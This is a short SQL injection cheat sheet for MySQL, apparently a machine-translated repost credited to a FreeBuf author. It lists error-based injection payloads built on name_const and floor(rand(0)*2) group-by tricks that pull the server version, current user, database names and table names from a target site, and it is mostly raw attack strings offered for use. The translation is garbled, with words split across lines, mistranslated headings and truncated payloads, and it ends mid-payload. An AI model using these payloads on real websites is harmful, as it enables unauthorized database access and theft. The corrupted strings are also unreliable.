MySql Error Based Injection Reference
[Mysql brute-force injection reference]
Author: Pnig0s1992
Blog: http://pnig0s1992.blog.51cto.com/
TeAm: http://www.FreeBuf.com/
Mysql5.0.91 passed the test. Most versions of MySQL 5 + can be tested successfully.
If name_const () is used in a few versions, an error is reported. You can use the Method.2 test given.
Query version:
Method.1: and + exists (select * from + (select * from (select + name_const (@ version, 0) a +
Join + (select + name_const (@ version, 0) B) c)
Method.2: and + (SELECT + 1 + FROM + (select + count (*), concat (floor (rand (0) * 2), (SELECT + version ())) a + from + information_schema.tables + gro
Up by a) B)
Query the current user:
Method.1: and + exists (select * from + (select * from (select + name_const (user (), 0) a + join + (select + name_const (user (), 0) B) c)
Method.2: and + (select + 1 + from (select + count (*), concat (select + user () + from + information_schema.tables + limit + 0, 1 ). floor (r
And (0) * 2) x + from + information_schema.tables + group + by + x))
Query the current database:
Method.1: and + exists (select * from + (select * from (select + name_const (database (), 0) a + join + (select + name_const (database (), 0) B) c)
Method.2: and + (select + 1 + from (select + count (*), concat (select + database () + from + information_schema.tables + limit + 0, 1 ). flo
Or (rand (0) * 2) x + from + information_schema.tables + group + by + x))
Database explosion in sequence
LIMIT + n, 1), 0) a + join + (select + name_const (SELECT + distinct + schema_name + FROM + information_schema.schemata + LIMIT + n, 1), 0 )) b) c) convert n
Sequential replacement
Specify the number of databases to be cracked:
And + (select + 1 + from (select + count (*), concat (select + (SELECT + count (table_name) + FROM + 'information _ scheme '. tables + WHERE + t
Able_schema = 0x6D7973716C) + from + information_schema.tables + limit + 0, 1), floor (rand (0) * 2) x + from + information_schema.tables + group
+ By + x) a) + and + 1 = 1 0x6D7973716C = mysql
Burst tables in sequence:
And + (select + 1 + from (select + count (*), concat (select + (SELECT + distinct + table_name + FROM + information_schema.tables + Where + t